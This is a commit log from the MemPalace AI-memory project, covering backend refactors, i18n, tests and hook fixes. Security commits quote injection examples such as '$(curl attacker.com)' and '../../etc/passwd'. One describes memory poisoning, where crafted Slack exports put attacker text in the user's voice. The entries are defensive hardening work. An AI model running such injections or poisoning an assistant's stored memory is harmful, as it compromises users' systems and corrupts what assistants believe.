Commit Graph

130 Commits

Author SHA1 Message Date
Igor Lins e Silva 61dd6e7d9c test(backends): fix Windows file-lock in cache-invalidation test
PermissionError [WinError 32] on Windows when Path.unlink() runs while
chromadb.PersistentClient still holds a handle on chroma.sqlite3. Rewrite
test_chroma_cache_invalidates_when_db_file_missing to prime
backend._clients/_freshness with a sentinel object instead of opening a
real PersistentClient, so the unlink runs against an unheld file.

The assertion is also corrected: after invalidation, ChromaBackend's
_client rebuilds a fresh PersistentClient which re-creates chroma.sqlite3
and re-stats it, so freshness ends up at the post-rebuild stat (not
(0, 0.0) as the assertion previously expected). The meaningful invariant
is "freshness advanced past the pre-unlink value AND the sentinel was
replaced", which the test now checks.

Ref: Windows CI failure on 995.
2026-04-18 13:52:56 -03:00
copilot-swe-agent[bot] 24bf97bb65 fix(tests): avoid ONNX network download in update-length validation tests
test_base_collection_update_default_validates_list_lengths and
test_base_collection_update_default_rejects_mismatched_lengths were
spinning up a real ChromaBackend and calling add(documents=...), which
triggered ChromaDB's default ONNX embedding function and attempted a
network download — failing in offline/sandboxed CI.

BaseCollection.update() validates list lengths before any DB access, so
no items need to be pre-loaded for the length-check to fire. Switch both
tests to use _FakeCollection (same as the rest of the unit tests in this
file) so they are pure in-memory and network-free.

Also fixes a structural bug in test 1: collection._collection.add() was
accidentally placed inside the pytest.raises(ValueError) block, masking
the real assertion.

Agent-Logs-Url: https://github.com/MemPalace/mempalace/sessions/55fc663e-b256-4b8b-88ce-4271560def8d

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>
2026-04-18 16:23:58 +00:00
Igor Lins e Silva 42b940d263 fix(backends): address Copilot review on #995
Four defects surfaced by the automated review, fixed with targeted tests:

1. BaseCollection.update() default now validates that documents / metadatas /
   embeddings lengths match ids, raising ValueError instead of silently
   misaligning pairs or raising IndexError (base.py).

2. ChromaCollection.query() now rejects the two ambiguous input shapes up
   front — neither or both of query_texts / query_embeddings, and empty input
   lists — with clear ValueError messages rather than delegating to chromadb's
   less-obvious errors (chroma.py).

3. QueryResult.empty() accepts embeddings_requested=True to preserve the
   outer-query dimension with empty hit lists when the caller asked for
   embeddings, matching the spec rule that included fields carry the outer
   shape even when empty (base.py). ChromaCollection.query() threads this
   through on the empty-result path (chroma.py).

4. ChromaBackend cache-freshness check now matches the semantics from
   mcp_server._get_client (merged via #757) on three edge cases Copilot
   called out: (a) invalidate when chroma.sqlite3 disappears while a cached
   client is held, (b) treat a 0→nonzero stat transition as a change so a
   cache built when the DB did not yet exist is refreshed, (c) re-stat
   after PersistentClient constructs the DB lazily so freshness reflects
   the post-creation state (chroma.py).

Tests: 978 passed (up from 970), 8 new tests covering the fixes.
2026-04-18 13:19:18 -03:00
Igor Lins e Silva a17a8b734a refactor(backends): typed QueryResult/GetResult, PalaceRef, BaseBackend registry (RFC 001 §10)
Advances RFC 001 §10 cleanup so backend-author PRs (#574 LanceDB, #665 Postgres,
#700 Qdrant, #697 hosted, #643 PalaceStore, #381 Qdrant) have a stable target
to align against.

Scope (this PR):

- Typed QueryResult / GetResult dataclasses replace Chroma's dict shape at
  the BaseCollection boundary (§1.3). A transitional _DictCompatMixin keeps
  existing callers working while the attribute-access migration proceeds.
- BaseCollection is now kwargs-only across add/upsert/query/get/delete/update
  with ABC defaults for estimated_count/close/health and a non-atomic default
  update() (§1.1–1.2).
- PalaceRef replaces raw path strings at the backend boundary (§2.2).
- BaseBackend ABC with get_collection/close_palace/close/health/detect (§2.3).
- mempalace.backends entry-point group + in-tree registry with
  resolve_backend_for_palace priority order matching §3.2–3.3.
- ChromaCollection normalizes chroma returns into typed results; unknown
  where-clause operators raise UnsupportedFilterError (no silent drop, §1.4).
- ChromaBackend absorbs the inode/mtime client-cache freshness check
  previously duplicated in mcp_server._get_client() (§10 + PR #757).
- searcher.py migrated to typed-attribute access as the reference call
  site; remaining callers land in a follow-up.
- pyproject: chroma registered via [project.entry-points."mempalace.backends"].

Out of scope (explicit follow-ups):

- Full caller migration off the dict-compat shim across palace.py,
  mcp_server.py, miner.py, convo_miner.py, dedup.py, repair.py, exporter.py,
  palace_graph.py, cli.py, closet_llm.py.
- Embedder injection + three-state EmbedderIdentityMismatchError check (§1.5).
- maintenance_state() / run_maintenance() benchmark hooks (§7.3).
- AbstractBackendContractSuite full coverage (§7.1–7.2).
- mempalace migrate / mempalace verify CLI rewrites through BaseCollection (§8).

Tests: 970 passed (up from 967 on develop); new coverage for typed results,
empty-result outer-shape preservation, \$regex rejection, registry lookup,
priority resolver, and PalaceRef-kwarg ChromaBackend.get_collection.

Refs: #743 (RFC 001), #989 (RFC 002 tracking issue).
2026-04-18 12:45:16 -03:00
Igor Lins e Silva 55a004fe1e Merge pull request #931 from mvalentsev/fix/i18n-entity-metadata
fix: use i18n candidate patterns for entity extraction in miner and palace
2026-04-16 15:54:01 -03:00
Igor Lins e Silva c5e249bba8 Merge pull request #946 from mvalentsev/fix/utf8-read-text
fix: add explicit UTF-8 encoding to read_text() calls (#776)
2026-04-16 15:52:42 -03:00
Igor Lins e Silva 65f99ad7e6 Merge pull request #928 from arnoldwender/fix/i18n-lang-case-insensitive
fix(i18n): resolve language codes case-insensitively (#927)
2026-04-16 15:44:36 -03:00
mvalentsev 09fe2dda3c fix: add explicit UTF-8 encoding to read_text() calls (#776)
On Windows with non-UTF-8 locale (e.g. GBK), Path.read_text() defaults
to platform encoding, breaking onboarding tests and any source code that
reads JSON/markdown with non-ASCII content.

5 files, 8 call sites fixed.
2026-04-16 16:00:29 +05:00
🍕 88f5b5fa0e Add Indonesian language support
Introduces the Indonesian (id) locale, providing translations for CLI commands, status messages, and core terminology.

Includes language-specific regex patterns for stop words and action detection to support text processing and indexing in Indonesian. The test suite is updated with a sample case to verify correct dialect handling and compression.
2026-04-16 16:15:47 +08:00
mvalentsev 8bf940f861 fix: use i18n candidate patterns for entity extraction in miner and palace
entity_detector.py was refactored in #911 to load candidate patterns
from i18n locale JSON files, supporting non-Latin scripts (Cyrillic,
accented Latin, etc.). But three other code paths still hardcoded the
ASCII-only regex [A-Z][a-z]{2,}, silently missing non-Latin entity
names in metadata tagging, closet indexing, and registry lookups.

Replace the hardcoded regex with a shared _candidate_entity_words()
helper that reuses the same i18n candidate_patterns as entity_detector.
2026-04-16 10:35:40 +05:00
Igor Lins e Silva f895bc58e6 fix(entity_detector): script-aware word boundaries for combining-mark scripts
Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras)
like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w.
This means \b splits mid-word on every matra: names like अनीता (Anita)
truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b
never match because \b fails after the final matra of कहा.

Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script
whose words contain combining marks.

Fix: locales with combining-mark scripts declare a boundary_chars field
in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n
loader replaces every \b in that locale's patterns with a script-aware
lookaround that treats the declared characters as "inside-word", and
pre-wraps candidate/multi_word patterns with the same boundary.

Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru,
it are unchanged.

Changes:
- mempalace/i18n/__init__.py: add _script_boundary, _expand_b,
  _wrap_candidate, _collect_entity_section; candidate_patterns are now
  returned fully-wrapped (boundary + capture group applied)
- mempalace/entity_detector.py: extract_candidates compiles pre-wrapped
  candidate patterns directly instead of re-wrapping with \b
- tests/test_entity_detector.py: 5 new tests for Devanagari boundaries
  (name extraction with/without boundary_chars, person-verb firing,
  English regression)
2026-04-15 22:18:52 -03:00
Arnold Wender 0174b93d0f fix(i18n): resolve language codes case-insensitively (#927)
BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the
locale files mix conventions (pt-br.json vs zh-CN.json). On
case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently
missed the file, _load_entity_section returned {}, and entity
detection ran in English with no warning.

The cache key in get_entity_patterns was built from raw input, so
('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong.

Add _canonical_lang(lang) that resolves any casing to the on-disk
filename stem via lowercase comparison, and route load_lang,
_load_entity_section, and the cache key through it.

Closes #927
2026-04-15 23:33:42 +02:00
Igor Lins e Silva 312b3b5f0e Merge pull request #758 from mvalentsev/fix/i18n-review-issues
fix: address i18n review issues from PR #718
2026-04-15 13:45:49 -03:00
Igor Lins e Silva c722c91e2a test: document orphan-locale recovery for _temp_locale helper 2026-04-15 08:54:23 -03:00
Igor Lins e Silva b214aced90 refactor(entity_detector): make multi-language extensible via i18n JSON
Move all entity-detection lexical patterns (person verbs, pronouns,
dialogue markers, project verbs, stopwords, candidate character class)
out of hardcoded module-level constants and into the entity section of
each locale's JSON in mempalace/i18n/. Adds a languages parameter to
every public function so callers union patterns across the desired
locales. The default stays ("en",), so all existing callers and tests
behave unchanged.

Also adds:
- get_entity_patterns(langs) helper in mempalace/i18n/ that merges
  patterns across requested languages, dedupes lists, unions stopwords,
  and falls back to English for unknown locales
- MempalaceConfig.entity_languages property + setter, with env var
  override (MEMPALACE_ENTITY_LANGUAGES, comma-separated)
- mempalace init --lang en,pt-br flag (persists to config.json)
- Per-language candidate_pattern so non-Latin scripts (Cyrillic,
  Devanagari, CJK) can register their own character classes instead of
  being silently dropped by the ASCII-only [A-Z][a-z]+ default
- _build_patterns LRU cache keyed by (name, languages) so multi-language
  callers don't poison each other's cache slots

Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only
add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that
needed entity_detector changes and inlined a _PTBR variant of every
constant. That doesn't scale past 2-3 languages — every text gets
checked against every language's patterns regardless of relevance, and
candidate extraction still drops accented and non-Latin names.

This PR sets the standard so future locale contributors only edit one
JSON file (no Python changes), and entity detection scales linearly
with how many languages a user actually enabled, not how many ship.
2026-04-15 08:52:42 -03:00
Igor Lins e Silva 56b6a6360f Merge pull request #908 from fatkobra/test/palace-graph-tunnels
test: add palace_graph tunnel helper coverage
2026-04-15 08:23:18 -03:00
fatkobra 966937d620 test: add palace_graph tunnel helper coverage
Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`.

Covered:
- `_load_tunnels`
- `_save_tunnels`
- `create_tunnel`
- `list_tunnels`
- `delete_tunnel`
- `follow_tunnels`
2026-04-15 11:38:18 +02:00
Marcio E. Heiderscheidt e61dc2adf8 fix: add provenance header and speaker IDs to Slack transcript imports (#815)
* fix: add provenance header and speaker IDs to Slack transcript imports

Slack exports are multi-party chats where no speaker is inherently
the "user" or "assistant". The parser previously assigned these roles
purely by position, allowing a crafted export to place attacker text
in the "user" role — making it appear as the memory owner's words
in all future retrieval (data poisoning via stored memory).

Changes:
- Add provenance header marking Slack transcripts as multi-party
  with positional (unverified) role assignment
- Prefix each message with the original speaker ID ([U1], [U2], etc.)
  so downstream consumers can distinguish authors
- Keep user/assistant role alternation for exchange-pair chunking
  compatibility with convo_miner.py

Tests:
- Provenance header presence and content
- Speaker ID preservation in output
- Attacker-first-message attribution verification

Refs: MemPalace/mempalace#809

* fix: move Slack provenance to footer, sanitize speaker IDs, extract constant

- Move provenance notice from header to footer to prevent it becoming
  a standalone ChromaDB drawer via paragraph chunking on exports
  with fewer than 3 exchange pairs (violates verbatim-always principle)
- Sanitize speaker user_id/username: strip brackets, newlines, and
  control characters to prevent chunk-boundary injection via crafted
  Slack exports
- Extract header string to _SLACK_PROVENANCE_FOOTER module constant,
  consistent with _TOOL_RESULT_* constants pattern; tests import it
  instead of duplicating the literal

Refs: MemPalace/mempalace#809
2026-04-15 00:27:01 -07:00
sha2fiddy a15094ce60 feat: include created_at timestamp in search results (#846)
* feat: include created_at timestamp in search results (closes #465)

Surface the existing filed_at metadata as created_at in search result
objects returned by search_memories(). Enables temporal reasoning over
search hits without additional queries.

* Feat: add fallback for missing filed_at metadata
2026-04-15 00:26:57 -07:00
Mikhail Valentsev ecd44f7cb7 fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863)
* fix(hooks): stop precompact hook from blocking compaction

The precompact hook unconditionally returned {"decision": "block"},
which in Claude Code means "cancel compaction" with no retry mechanism.
This made /compact permanently broken for all plugin users.

Changed hook_precompact() to mine the transcript synchronously (so data
lands before compaction) and return {"decision": "allow"}. This matches
the standalone bash hook in hooks/ which already uses allow.

Also extracted _get_mine_dir() and _mine_sync() helpers so precompact
can mine from the transcript directory, not just MEMPAL_DIR.

Stop hook behavior is unchanged -- left for #673 which implements the
full silent save path.

Closes #856, closes #858.

* fix: use empty JSON instead of invalid \"allow\" decision value

Claude Code only recognizes \"block\" as a top-level decision value.
\"allow\" is a permissionDecision value for PreToolUse hooks, not a
valid top-level decision. The correct way to not block is to return
empty JSON. Caught by #872.
2026-04-15 00:26:54 -07:00
Arnold Wender b226251ddf fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864)
* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225)

Fixes #225.

Several transitive dependencies (chromadb, onnxruntime, posthog) print
banners and warnings to stdout — sometimes at the C level — during the
mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC
over stdio, any non-JSON output on stdout corrupted the message stream
and broke Claude Desktop's parser with errors like:

  MCP mempalace: Unexpected token '*', "**********"... is not valid JSON
  MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON
  MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON

Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude
Desktop 1.1062.0.

Fix: at module load, redirect stdout to stderr at both the Python level
(sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1))
to catch C-level prints, while preserving the real stdout for later
restore. main() calls _restore_stdout() right before entering the
protocol loop so JSON-RPC responses still go to the real stdout.

Adds tests/test_mcp_stdio_protection.py with three regression tests:
- module-level redirect is in place after import
- _restore_stdout() restores the original stdout (idempotent)
- 'python -m mempalace.mcp_server' with empty stdin emits no stdout

* style: reformat with ruff 0.4 (CI version) for #225
2026-04-15 00:26:51 -07:00
Arnold Wender 0aee6f3ed9 fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866)
Partially addresses #185.

`mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into
the project root. When <dir> is a git repository, those files have no
default protection and risk being committed by accident — the loudest
concern in the original report.

This PR adds `_ensure_mempalace_files_gitignored()` which runs at the
end of cmd_init: if <dir>/.git exists, append the two filenames to
.gitignore (creating it if necessary) under a clearly-marked block.

The helper is conservative:
- only runs when <dir>/.git is present (no-op for non-git projects)
- skips entries already present (no duplicates)
- preserves existing .gitignore content
- handles files without trailing newlines

This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the
issue's 'Expected' section proposes — that's a behavioral change with
miner/config implications and warrants a separate design discussion.
The gitignore safeguard removes the immediate risk without breaking any
existing flow.

Tests: 5 cases in tests/test_init_gitignore_protection.py covering
no-op, fresh creation, partial append, idempotency, and missing-newline
edge case.
2026-04-15 00:26:41 -07:00
Arnold Wender 6a73eb2e20 fix(searcher): guard against empty ChromaDB query results (#195) (#865)
Fixes #195.

When ChromaDB returns no documents (empty palace, or wing/room filter
that excludes everything), it returns the shape:

    {"documents": [], "metadatas": [], "distances": []}

Indexing `results["documents"][0]` blindly raises IndexError instead of
the expected 'no results' response. Affected: searcher.search(),
searcher.search_memories() (drawer + closet branches plus the
total_before_filter aggregate), and Layer3.search() / Layer3.search_raw().

Adds a tiny private helper `searcher._first_or_empty(results, key)` that
safely extracts the inner list, returning [] for any of: missing key,
empty outer list, [None], or [[]]. layers.py imports the same helper to
avoid duplicating the guard.

Tests: tests/test_empty_chromadb_results.py covers all observed shapes
plus a documentation-style test that pins the original IndexError so
future readers understand why the helper exists.
2026-04-15 00:26:38 -07:00
Mikhail Valentsev 54a386d925 fix: return empty status instead of error on cold-start palace (#830) (#831)
tool_status() called _get_collection() with the default create=False,
which throws when the ChromaDB collection does not exist yet (valid
palace, zero drawers). The exception was swallowed and status returned
"No palace found" even though init had completed successfully.

Switching to create=True bootstraps an empty collection on first
status call, matching what the write path already does.

Fix suggested by @hkevinchu in the issue.
2026-04-15 00:26:35 -07:00
Marcio E. Heiderscheidt f20f45a2da fix: make entity_registry.research() local-only by default (#811)
* fix: make entity_registry.research() local-only by default

research() previously called _wikipedia_lookup() unconditionally,
sending entity names to en.wikipedia.org on every uncached lookup.
This violates the project's local-first and privacy-by-architecture
principles documented in CLAUDE.md.

Changes:
- research() now returns "unknown" for uncached words by default
- New allow_network=True parameter required for Wikipedia lookups
- Wikipedia 404 now returns "unknown" instead of asserting "person"
  with 0.70 confidence, preventing entity registry poisoning
- Added privacy warning docstring to _wikipedia_lookup()
- Added tests for local-only default, opt-in network, 404 handling,
  and cache-not-persisted-on-local-only behaviour

Refs: MemPalace/mempalace#809

* fix: improve research() cache read path and deduplicate test mocks

- Use .get() instead of .setdefault() for cache reads in research()
  so the local-only path never mutates _data unnecessarily
- Move .setdefault() to the network-write path only
- Use result.setdefault() for word/confirmed keys to ensure
  consistent return shape across all _wikipedia_lookup error paths
- Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON
  constant shared by 3 test functions
2026-04-15 00:26:24 -07:00
mvalentsev d565718922 fix: address i18n review issues from PR #718
Three issues flagged by bensig on the i18n PR before merge:

1. ko.json: status_drawers used {drawers} instead of {count}, causing
   the Korean UI to show the raw template string instead of the actual
   drawer count.  All other 7 languages use {count}.

2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py
   with a sys.path.insert hack.  Moved to tests/test_i18n.py per the
   project convention in AGENTS.md.

3. Dialect.from_config() passed lang=config.get("lang") which defaults
   to None, causing __init__ to inherit whatever language was loaded
   earlier via module-level state.  Now defaults to "en" explicitly so
   from_config is deterministic regardless of prior load_lang() calls.

Added two regression tests for the ko.json fix and the state leak.
2026-04-15 11:03:28 +05:00
Igor Lins e Silva 107685930d docs+tests: fix CI after README slim (#875)
The regression-guard tests added in #835 were pinned to the old
README shape (tool table + file-reference table). When #897 slimmed
the README and moved that content to the website, three tests
started failing:

  TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict
  TestNoUnlistedTools.test_no_undocumented_tools
  TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless

Changes in this commit:

1. Update the 3 tests to track the new canonical docs surfaces
   - Tool list -> website/reference/mcp-tools.md
     (tests parse `### \`mempalace_xxx\`` headings instead of
     markdown table rows).
   - dialect.py lossless disclaimer -> website/reference/modules.md
     (any line mentioning dialect.py must not also say "lossless").

2. Fix the website to make "no undocumented tools" true
   Add the 10 tools that existed in TOOLS but were missing from
   website/reference/mcp-tools.md (create_tunnel, delete_tunnel,
   follow_tunnels, list_tunnels, get_drawer, list_drawers,
   update_drawer, hook_settings, memories_filed_away, reconnect).
   Page header now correctly says "all 29 MCP tools".

3. Align pre-commit ruff pin to match CI (0.4.x)
   .pre-commit-config.yaml was pinning ruff v0.9.0, while
   .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two
   formatters produce incompatible output (e.g. v0.9.0 reformats
   `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects),
   which would cause the pre-commit hook to modify files that CI
   then flags as unformatted. Pinning the hook to v0.4.10 keeps
   the dev loop and CI in lock-step.

Full suite: 887 passed, 0 failed.
2026-04-14 21:59:55 -03:00
MSL 3094c0bd10 fix: add missing self._lock to KnowledgeGraph.close()
TDD: test first, failed, fixed, passed.

Igor fixed query_relationship/timeline/stats in an earlier commit.
close() was the last method touching self._connection without
holding the lock.

Closes #883.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-14 13:09:10 -07:00
Igor Lins e Silva c9b3245994 Merge pull request #880 from MemPalace/perf-optimize-regex-compilation-15578943484596502942
 Optimize regex compilation in entity extraction
2026-04-14 15:10:34 -03:00
Milla J 3ac75d0fdb feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871)
export MEMPAL_VERBOSE=true  → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)

Developers need to see code and diaries being written.
Regular users want zero chat clutter. Now both work.

TDD: tests written first, failed, code fixed, tests pass.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-14 10:55:56 -07:00
google-labs-jules[bot] 21793cfb48 perf: optimize regex compilation in entity extraction
Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution.

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>
2026-04-14 17:43:26 +00:00
Igor Lins e Silva 4741bc0055 Merge pull request #873 from sha2fiddy/feature/455/kg-sanitize-punctuation
fix: use permissive validator for KG entity values
2026-04-14 14:15:33 -03:00
Igor Lins e Silva e1d24d8087 Merge pull request #812 from Kesshite/fix/security-hook-injection
fix: harden hooks against shell injection, path traversal, and arithmetic injection
2026-04-14 14:10:33 -03:00
Matt Van Horn e8e93b53c0 fix: allow mining directories without local mempalace.yaml
When no mempalace.yaml or mempal.yaml exists in the source directory,
return a default config (wing = directory name, room = general) instead
of calling sys.exit(1). This lets users mine any directory into their
palace without requiring init first.

Closes #14.
2026-04-14 13:53:07 -03:00
eblander 79c9c0e517 fix: use permissive validator for KG entity values (closes #455)
sanitize_name rejects commas, colons, parentheses, and slashes — characters
that commonly appear in knowledge graph subject/object values. Adds
sanitize_kg_value for KG entity fields (subject, object, entity) while
keeping sanitize_name for predicates and wing/room names.
2026-04-14 09:26:47 -04:00
BLUDATA\marcio.heiderscheidt f7d703fd5b fix: add logging on rejected transcript paths and platform-native path test
- _count_human_messages() now logs a WARNING via _log() when a
  non-empty transcript_path is rejected by the validator, making
  silent auto-save failures diagnosable via hook.log
- Add test for platform-native paths (backslashes on Windows) to
  verify _validate_transcript_path works cross-platform
- Add test verifying the warning log is emitted on rejection

Refs: MemPalace/mempalace#809
2026-04-14 07:54:42 -03:00
BLUDATA\marcio.heiderscheidt 0f217f7c80 fix: harden hooks against shell injection, path traversal, and arithmetic injection
save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace/mempalace#809
2026-04-14 07:54:42 -03:00
Igor Lins e Silva 267a644f4f refactor: route all chromadb access through ChromaBackend
Prerequisite for RFC 001 (plugin spec, #743). Removes every direct
`import chromadb` outside the ChromaDB backend itself so the core
modules depend only on the backend abstraction layer.

Extends ChromaBackend with make_client, get_or_create_collection,
delete_collection, create_collection, and backend_version. Adds
update() to the BaseCollection contract. Non-backend callers
(mcp_server, dedup, repair, migrate, cli) now go through the
abstraction; tests patch ChromaBackend instead of chromadb.

With this landed, the RFC 001 spec can be enforced and PalaceStore
(#643) can ship as a plugin without touching core modules.
2026-04-14 00:31:16 -03:00
Milla J 045023f449 fix: save hook auto-mines transcript without MEMPAL_DIR (#840)
TDD: test written first, failed, then fixed.

Problem: save hook says "saved in background" but MEMPAL_DIR defaults
to empty, so nothing actually mines. Users get no auto-save despite
the hook firing every 15 messages.

Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's
JSON input) to discover the session directory. Mine that directory
automatically. MEMPAL_DIR is still supported as override but no
longer required.

Also fixed: bare python3 → $(command -v python3) for nohup safety.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-13 18:09:59 -07:00
Igor Lins e Silva 5320246297 Merge pull request #807 from sha2fiddy/fix/218-cosine-distance-metadata
Fix: set cosine distance metadata on all collection creation sites
2026-04-13 21:18:40 -03:00
Milla J 62df24599e fix: README audit — 42 TDD tests + hall detection + 7 claim fixes (#835)
* fix: README audit — match every claim to shipped code + add hall detection

TDD audit: wrote 42 tests verifying README claims against codebase.
Fixed all 7 failures:

1. Tool count: 19 → 29 (10 tools were undocumented)
2. Added tool table rows for tunnels, drawer management, system tools
3. Version badge: 3.1.0 → 3.2.0
4. dialect.py file reference: "30x lossless" → "AAAK index format for closet pointers"
5. Wake-up token cost: "~170 tokens" → "~600-900 tokens" (matches layers.py)
6. pyproject.toml version in project structure: v3.0.0 → v3.2.0
7. Hall detection: added detect_hall() to miner.py — drawers now tagged
   with hall metadata so palace_graph.py can build hall connections

New code:
- miner.py: detect_hall() — keyword scoring against config hall_keywords,
  writes hall field to every drawer's metadata
- tests/test_hall_detection.py — 12 TDD tests (written before code)
- tests/test_readme_claims.py — 42 TDD tests verifying README accuracy

859/859 tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: resolve ruff lint — unused imports and variables

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* style: ruff format with CI-pinned 0.4.x

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: use conftest fixtures in hall tests for Windows compat

Windows CI fails with NotADirectoryError when ChromaDB tries to
write HNSW files in short-lived TemporaryDirectory. Use conftest
palace_path and tmp_dir fixtures instead — same pattern as all
other tests that touch ChromaDB.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address Igor's review — convo_miner halls, cached config, markdown typo

TDD: wrote tests for convo_miner hall metadata and config caching
BEFORE verifying the code changes.

1. README markdown typo: extra ** in wake-up token row (line 195)
2. convo_miner.py: added _detect_hall_cached() — conversation
   drawers now get hall metadata (was missing, Igor caught it)
3. miner.py + convo_miner.py: cached hall_keywords at module level
   so config.json isn't re-read per drawer during bulk mine
4. New tests: TestConvoMinerWritesHalls, TestDetectHallCaching

861/861 tests pass. ruff clean.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-13 17:11:11 -07:00
eblander 8dc5970ca9 Fix: ruff format with CI-pinned version (0.4.x) 2026-04-13 18:29:48 -04:00
Igor Lins e Silva 1dc20e307b test: verify mine_lock via disjoint critical-section intervals
The previous revision used multiprocessing but still relied on timing
("second process waited at least N seconds") which flakes on CI where
spawn overhead eats into the hold window. Linux CI observed the second
process report a 0.088s wait — below the 0.1s threshold — even though
the lock behavior was correct; spawn was just slow enough that the
first process had nearly finished holding when the second got past
its own spawn.

Switch to effect-based verification: each worker logs its
[enter_time, exit_time] inside the critical section, and the test
asserts the two intervals are disjoint after sorting. A broken lock
would produce overlapping intervals regardless of spawn latency; a
working lock cannot.

Also removed the mp.Queue since we no longer pass timing data back.
2026-04-13 19:08:57 -03:00
Igor Lins e Silva e052074624 test: serialize mine_lock concurrency test with multiprocessing
The macOS CI job failed ``test_lock_blocks_concurrent_access`` because
``fcntl.flock`` on BSD/macOS is per-*process*, not per-FD: two threads
in the same process both acquire even when they open their own file
descriptors. The test passed on Linux (per-FD flock) and Windows
(per-FD ``msvcrt.locking``) but was never actually exercising the
lock's real contract.

``mine_lock`` is designed to serialize multi-*agent* access — i.e.,
separate processes, not threads. Switch the test to
``multiprocessing.get_context('spawn')`` with a module-level worker
(so the spawn pickles cleanly) so it:

  1. reflects the actual use case (one lock per mining process);
  2. passes on all three OSes without flock-semantics branching;
  3. catches real regressions (a broken lock would now let both
     processes through, exactly what we care about).

Hold time bumped to 0.3s and the "wait until p1 acquires" delay to
0.2s to tolerate spawn's higher startup latency on macOS/Windows.
2026-04-13 19:02:51 -03:00
Igor Lins e Silva 7192552624 test: make diary state path assertion platform-neutral
The Windows CI job failed on:

    assert '/.mempalace/state/' in str(state_path)

because Windows uses ``\`` as the path separator, so the substring
never matches. The behavior under test (state file lives outside the
diary dir, under ``~/.mempalace/state/``) is already correct on both
platforms — only the assertion was Unix-only.

Switch to ``state_path.parent`` comparisons that work on any OS.
2026-04-13 18:55:36 -03:00
Igor Lins e Silva 6b7dcc53d4 merge: pr/closet-llm-generic + harden LLM regen path for production
Brings in PR #793 (optional LLM-based closet regeneration via
user-configured OpenAI-compatible endpoint) and PR #795 (hybrid
closet+drawer search — closets boost, never gate). Stack: #784#788#789#790#791#792#793 (+ #795).

Findings hardened on our side
─────────────────────────────

1) closet_llm.regenerate_closets didn't use the blessed palace helpers.

   Before:
     * manual closets_col.get(where=...) + .delete(ids=...) with a
       silent ``except Exception: pass`` around both — if the purge
       failed, pre-existing regex closets survived alongside fresh LLM
       closets, giving the searcher double hits for the same source.
     * ``source.split('/')[-1][:30]`` to build the closet_id — quietly
       wrong on Windows paths (``C:\\proj\\a.md`` has no ``/``, so the
       whole string ends up in the ID).
     * no mine_lock around purge+upsert — a concurrent regex rebuild of
       the same source could interleave with our purge and leave a mix
       of regex and LLM pointers.
     * no ``normalize_version`` stamp on the LLM closets — the miner's
       stale-version gate would treat them as leftovers from an older
       schema and rebuild over them on the next mine.

   After: routes through ``purge_file_closets`` + ``mine_lock`` +
   ``os.path.basename`` + ``NORMALIZE_VERSION`` stamp. Regression tests
   cover each.

2) searcher.search_memories was still closet-first.

   PR #795 merged into #793's head to fix the recall regression
   documented in that PR (R@1 0.25 on narrative content vs. 0.42
   baseline). The hybrid design makes closets a ranking boost rather
   than a gate: drawers are always queried at the floor, and matching
   closet hits (rank 0-4 within CLOSET_DISTANCE_CAP=1.5) add a boost
   of 0.40/0.25/0.15/0.08/0.04 to the effective distance.

   Merged to take the incoming hybrid design, with two cleanups:
   * kept the ``_expand_with_neighbors`` / ``_extract_drawer_ids_from_closet``
     helpers as separately-tested utilities (still imported by tests
     and future callers);
